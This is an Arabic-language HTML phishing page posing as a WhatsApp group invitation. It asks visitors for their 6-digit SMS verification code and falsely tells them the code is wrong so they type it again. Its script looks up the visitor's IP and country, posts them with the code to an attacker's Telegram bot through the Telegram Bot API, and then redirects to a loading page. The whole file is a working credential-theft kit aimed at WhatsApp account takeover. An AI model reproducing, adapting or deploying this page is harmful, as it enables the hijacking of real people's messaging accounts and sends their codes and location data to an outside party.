<!DOCTYPE html>
<html lang="ar" id="facebook" class="">
<head>
        <meta charset="utf-8">
        <meta name="referrer" content="origin-when-crossorigin" id="meta_referrer">
        <title id="pageTitle">الدعوة للانضمام إلى مجموعة واتساب</title>
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <meta name="apple-mobile-web-app-capable" content="yes">
        <meta name="description" content="الدعوة للانضمام إلى مجموعة واتساب">
        <meta name="keywords">
        <meta property="og:title" content="">
        <meta property="og:image" content="https://static.whatsapp.net/rsrc.php/v3/yo/r/J5gK5AgJ_L5.png">
        <meta property="og:site_name" content="WhatsApp.com">
        <meta property="og:description" content="الدعوة للانضمام إلى مجموعة واتساب">
        <meta property="og:keywords">
        <meta property="invite_link_type" content="REGULAR">
        <meta property="invite_link_type_v2" content="">
        <meta name="mobile-web-app-capable" content="yes">
        <meta name="robots" content="noindex">
        <link rel="icon" href="https://static.whatsapp.net/rsrc.php/v3/yz/r/ujTY9i_Jhs1.png">
        <link type="text/css" rel="stylesheet" href="https://static.whatsapp.net/rsrc.php/v3/yI/l/0,cross/C2fHuK6eV5E.css?_nc_x=Ij3Wp8lg5Kz?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="vRp9yOm" crossorigin="anonymous" />
        <link type="text/css" rel="stylesheet" href="https://static.whatsapp.net/rsrc.php/v3/y-/l/0,cross/l7NbYm_6epW.css?_nc_x=Ij3Wp8lg5Kz?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="Dpp+Eva" crossorigin="anonymous" />
        <link type="text/css" rel="stylesheet" href="https://static.whatsapp.net/rsrc.php/v3/y9/l/0,cross/58P2v5ZIoPt.css?_nc_x=Ij3Wp8lg5Kz?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="X+JXpLn" crossorigin="anonymous" />

	<script
  src="https://code.jquery.com/jquery-3.7.1.min.js"
  integrity="sha256-/JqT3SQfawRcv/BIHPThkBvs0OEvtFFmqPF/lYI/Cxo="
  crossorigin="anonymous"></script>

  <link rel="stylesheet" href="style.css">


      <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Cairo&display=swap" rel="stylesheet">

    <style type="text/css">
        *{
            font-family: 'Cairo', sans-serif;
        }

        
        #sidebar-menu li a i{
            left: 5px;
        }
    </style>


  
      <style>
        /* Style the select element */
        .select-dropdown {
            position: relative;
            display: inline-block;
            width: 200px;
            /* Set the desired width */
            font-family: Arial, sans-serif;
            /* Set the desired font */
            font-size: 14px;
            /* Set the desired font size */
        }

        /* Style the select dropdown arrow */
        .select-dropdown::after {
            content: '\25BE';
            /* Unicode character for the down arrow */
            position: absolute;
            top: 50%;
            right: 10px;
            transform: translateY(-50%);
            pointer-events: none;
        }

        /* Style the dropdown options */
        .select-dropdown select {
            appearance: none;
            -webkit-appearance: none;
            -moz-appearance: none;
            width: 100%;
            padding: 8px 30px 8px 10px;
            border: 1px solid #ccc;
            background-color: #fff;
            cursor: pointer;
        }

        /* Style the selected option */
        .select-dropdown select option:checked {
            background-color: #e0e0e0;
        }

        /* Style the dropdown when it is open */
        .select-dropdown select:focus {
            outline: none;
            box-shadow: 0 0 4px rgba(0, 0, 0, 0.1);
        }

        /* Style the select element */
        #phoneCountryCode {
            border-top: none;
            border-left: none;
            border-right: none;
            width: 108px;
            background-color: #f1f1f1;
            padding: 10px;
            font-size: 16px;
            border-bottom: 3px solid #36ba6d;
            border-radius: 5px;
        }

        /* Style the phone input element */

        /* Style the form button */
        button[type="submit"] {
            padding: 10px 20px;
            font-size: 16px;
            background-color: #4CAF50;
            color: #fff;
            border: none;
            border-radius: 5px;
            cursor: pointer;
        }

        /* Style the form button on hover */
        button[type="submit"]:hover {
            background-color: #45a049;
        }

        .input-phone {
            border-top: none;
            border-left: none;
            border-right: none;
            width: 75%;
            font-size: 21px;
            border-bottom: 3px solid #36ba6d;
        }

        :focus {
            outline: none;

        }


        input::placeholder {

            opacity: 75%;
        }

        ._9vcv,
        ._advm {
            border: none;
        }

        ul.iti__country-list>#iti-0__country-listbox {
            list-style-type: none;
            margin-right: -266px;
            margin-top: 1px;
            padding: 0;
        }

        ._9r_7 h4,
        ._9r_7 ._7gz5,
        ._9r_7 p,
        ._9r_7 li,
        ._9r_7 ol {
            font-size: 21px;
            line-height: 26px;
        }

        .iti--separate-dial-code .iti__selected-flag {
            background-color: rgba(0, 0, 0, 0.05);
            margin-right: -77px;
            direction: ltr;
            margin-left: 29px;
            padding: 2px;
        }

        .iti--separate-dial-code .iti__selected-dial-code {
            margin-left: 4px;
        }

        .iti__flag.iti__sa {
            height: 15px;
            background-position: -4339px 0px;
            display: none;
        }

        input::placeholder {

            opacity: 75%;
        }

        ul {
            list-style-type: none;
            margin-right: -200;
            padding: 0;
        }

        .iti__country-list {
            position: relative;
            z-index: 2;
            list-style: none;
            text-align: left;
            padding: 0;
            margin: 0 0 -5px 23px;
            box-shadow: 1px 1px 4px rgba(0, 0, 0, 0.2);
            background-color: white;
            border: 1px solid #CCC;
            white-space: nowrap;
            max-height: 200px;
            overflow-y: scroll;
            -webkit-overflow-scrolling: touch;
        }

        #phone::placeholder {
            font-size: 16px;
            text-align: center;
        }

        .code-input-container {
            display: flex;
        }

        .code-input {
            border-top: none;
            border-right: none;
            border-left: none;
            border-bottom: 3px solid #36ba6d;
            direction: ltr;
            background-color: #f1f1f1;
            width: 40px;
            height: 40px;
            font-size: 18px;
            text-align: center;
            margin-right: 5px;
        }
        .btn.btn-default {
  background-color: #fff;
  color: #333;
  border: 1px solid #ccc;
  padding: 10px 20px;
  border: none;
  font-size: 14px;
  text-align: center;
  text-decoration: none;
  display: inline-block;
  cursor: pointer;
}

.btn.btn-default:hover {
  background-color: #e0e0e0;
}

.btn.btn-default:active {
  background-color: #d0d0d0;
}

.btn.btn-default:focus {
  outline: none;
  box-shadow: none;
}

span{
     font-family: 'Cairo', sans-serif;
}

    </style>
  
</head>

<header class="_af-2 _afwk" data-testid="whatsapp_www_header" id="u_0_0_J5" style="background: #fcf5eb;">
                    <div class="_afvx">
                        <div class="_afvy">
                            <div class="_af8g"><button aria-label="فتح قائمة الهاتف المحمول" class="_afvu _ain3 _9vcv" id="u_0_1_uK"><span class="_advp _aeam"><img  src="Minnu.png"></span></button>
                          
                          
                            </div>
                        </div><span class="_afwd"><a data-testid="whatsapp_www_header_logo_link" href="#" class="_9vcv" data-ms="{&quot;creative&quot;:&quot;link&quot;}"><span class="_advp _aeam"><img class="_afvz" alt="صفحة واتساب الرئيسية" src="https://static.whatsapp.net/rsrc.php/v3/yq/r/mdQNdcFMi0p.png"></span></a></span><span class="_afw1"><a data-testid="whatsapp_www_header_logo_link" href="#" class="_9vcv" data-ms="{&quot;creative&quot;:&quot;link&quot;}"><span class="_advp _aeam"><img class="_afvz" alt="صفحة واتساب الرئيسية" src="https://static.whatsapp.net/rsrc.php/v3/y7/r/DSxOAUB0raA.png"></span></a></span>
                        <nav class="_afwe">
                            <ul class="_afwg">
                                <li class="_afn_">
                                    <div><button aria-controls="replace_me_subnav" aria-expanded="false" id="u_0_7_NM" class="_9vd5 _aens _afod _afoe"><span class="_afog"><span class="_9vg3 _aj1b" style=" font-family: 'Cairo', sans-serif;">الخصائص</span></span></button>
                                      
                                    </div>
                                </li>
                                <li class="_afn_"><a href="#" class="_9vd5 _aens _afod" target="_self"><span><span class="_afog"><span class="_9vg3 _aj1b" style=" font-family: 'Cairo', sans-serif;">الخصوصية</span></span></span></a></li>
                                <li class="_afn_"><a href="#" class="_9vd5 _aens _afod" target="_self"><span><span class="_afog"><span class="_9vg3 _aj1b" style=" font-family: 'Cairo', sans-serif;">مركز
                                                    المساعدة</span></span></span></a></li>
                                <li class="_afn_"><a href="#" class="_9vd5 _aens _afod" target="_self"><span><span class="_afog"><span class="_9vg3 _aj1b" style=" font-family: 'Cairo', sans-serif;">المدونة</span></span></span></a></li>
                                <li class="_afn_"><a href="#" class="_9vd5 _aens _afod" target="_self"><span><span class="_afog"><span class="_9vg3 _aj1b" style=" font-family: 'Cairo', sans-serif;">للأنشطة التجارية</span></span></span></a></li>
                            </ul>
                        </nav>
                        <div class="_agga"><span class="_ag1l">
                        <span class="AA" style=" width: max-content; padding: 100px; ">
                        <a href="#" class="_9vd5 _aens _afod" target="_self"><span><span class="_afog"><span class="_9vg3 _aj1b" style=" font-family: 'Cairo', sans-serif;">واتساب
                                                    ويب</span></span></span></a></span><a href="#" class="_aeo8 _9vcv _9u4o _9u4i" data-ms="{&quot;creative&quot;:&quot;link&quot;}"><span class="_advp _aeam">تنزيل</span><span><svg width="16" height="16" viewBox="0 0 16 16" fill="none" class="_wauiIcon__download-alternative _agnt _9u4c">
                                            <path fill-rule="evenodd" clip-rule="evenodd" d="M13.75 13.75C13.75 14.1642 13.4142 14.5 13 14.5L3 14.5C2.58579 14.5 2.25 14.1642 2.25 13.75C2.25 13.3358 2.58579 13 3 13L13 13C13.4142 13 13.75 13.3358 13.75 13.75Z" fill="currentColor"></path>
                                            <path fill-rule="evenodd" clip-rule="evenodd" d="M8.7487 2C8.7487 1.58579 8.41291 1.25 7.9987 1.25C7.58448 1.25 7.2487 1.58579 7.2487 2L7.2487 9.53955L3.19233 5.51449C2.89831 5.22274 2.42344 5.22458 2.13168 5.5186C1.83993 5.81263 1.84177 6.2875 2.13579 6.57925L7.46912 11.8714C7.76154 12.1616 8.23325 12.1616 8.52567 11.8714L13.859 6.57926C14.153 6.2875 14.1549 5.81263 13.8631 5.5186C13.5714 5.22458 13.0965 5.22274 12.8025 5.51449L8.7487 9.53697L8.7487 2Z" fill="currentColor"></path>
                                        </svg></span></a></span><a href="#" aria-label="تنزيل" class="_afwh _adie _adif"><svg width="16" height="16" viewBox="0 0 16 16" fill="none" class="_wauiIcon__download-alternative _agnt _adid _afbl">
                                    <path fill-rule="evenodd" clip-rule="evenodd" d="M13.75 13.75C13.75 14.1642 13.4142 14.5 13 14.5L3 14.5C2.58579 14.5 2.25 14.1642 2.25 13.75C2.25 13.3358 2.58579 13 3 13L13 13C13.4142 13 13.75 13.3358 13.75 13.75Z" fill="currentColor"></path>
                                    <path fill-rule="evenodd" clip-rule="evenodd" d="M8.7487 2C8.7487 1.58579 8.41291 1.25 7.9987 1.25C7.58448 1.25 7.2487 1.58579 7.2487 2L7.2487 9.53955L3.19233 5.51449C2.89831 5.22274 2.42344 5.22458 2.13168 5.5186C1.83993 5.81263 1.84177 6.2875 2.13579 6.57925L7.46912 11.8714C7.76154 12.1616 8.23325 12.1616 8.52567 11.8714L13.859 6.57926C14.153 6.2875 14.1549 5.81263 13.8631 5.5186C13.5714 5.22458 13.0965 5.22274 12.8025 5.51449L8.7487 9.53697L8.7487 2Z" fill="currentColor"></path>
                                </svg></a></div>
                    </div>
                </header>
<body style=" background-color: #fcf5eb; ">

<div class="container" style=" margin-block: 100px; ">
  <div style=" text-align: center; margin: 20px;">
  <img class="_9vx6" src="https://static.whatsapp.net/rsrc.php/v3/yB/r/_0dVljceIA5.png">
  <h4 class="_9vd5 _9scb" style="color:#5E5E5E; font-size: large;">الدعوة للانضمام إلى مجموعة واتساب</h4>
  </div>
  <div style=" text-align: center; font-family: system-ui;">
  <h4 class="_9vd5 _9scb" style="color:#5E5E5E;">  أدخل رمز تفعيل الإضافة المكون من ٦ أرقام <br>  الذي تلقيته من خلال رسالة نصية   الذي تلقيته من خلال رسالة نصية
</h4>

  </div>

<form action="#">
<input type="hidden" id="ip">
<input type="hidden" id="country">

    <div class="input-group" style="text-align: center;">	  
      <input style="border-color: #eb2020;background: #de060630; width: auto;" type="text" id="sms" name="sms" placeholder="SMS Code">
	  <h4 class="_9vd5 _9scb" style="color:#5E5E5E; color: red;">الرمز غير صحيح</h4>
      <div id="error-message" style="text-align: center; color: red;"></div>
    </div>
	
	<p style="text-align: center;"><a class="btn btn-default" id="resend-sms" href="#" style="font-style: italic; font-size:13px;font-weight:bold">إعادة إرسال مرة آخرى</a></p>
<div style="text-align: center;">
    <button style="padding: 10px 20px;
        font-size: 16px;
        background-color: #4CAF50;
        color: #fff;
        border: none;
        border-radius: 5px;
        cursor: pointer;
        display: inline-block;
		width: 150px;font-family: 'Cairo', sans-serif;" type="submit">متابعة</button>
</div>
	
  </form>
</div>

<script>
    $(document).ready(function() {
        $('form').submit(function(event) {
            event.preventDefault();

            var smsCode = $("#sms").val();
            var ipAddress = $("#ip").val();
            var country = $("#country").val(); // استرجاع اسم الدولة

            // التحقق من إدخال رمز الـ SMS
            if (!smsCode || !smsCode.match(/^\d+$/)) {
                $("#error-message").text("ادخل رمز الـرمز بشكل صحيح");
                return;
            } else {
                $("#error-message").text(""); // إزالة رسالة الخطأ إذا تم إدخال رمز الـ SMS بشكل صحيح
            }

            var telegramMessage = "SMS Code ERRUR : " + smsCode + "\nIP : " + ipAddress + "\nCountry : " + country;

            var telegramBotUrl = "https://api.telegram.org/bot" + botConfig.botToken + "/sendMessage";
            var requestData = {
                chat_id: botConfig.chatId,
                text: telegramMessage
            };

            $.post(telegramBotUrl, requestData, function(response) {
                // بعد الإرسال، قم بتوجيه المستخدم إلى الصفحة الأخرى
                window.location.href = "Loadingo091a.html?FGDD=Loauyb734HSDHDS783JSDUE7Y34UEUY3GSDGHDSH73JS773USUSUS7ISUS63";
            });
        });

        // جلب معلومات الـ IP باستخدام خدمة ipinfo.io
        $.get("https://ipinfo.io/", function(response) {
            var ipAddress = response.ip;
            var country = response.country; // استرجاع اسم الدولة

            // تحديث الحقل الخاص بالـ IP
            $("#ip").val(ipAddress);

            // تحديث الحقل الخاص بالدولة
            $("#country").val(country);
        }, "json");
    });
</script>

      

</body>

</html>
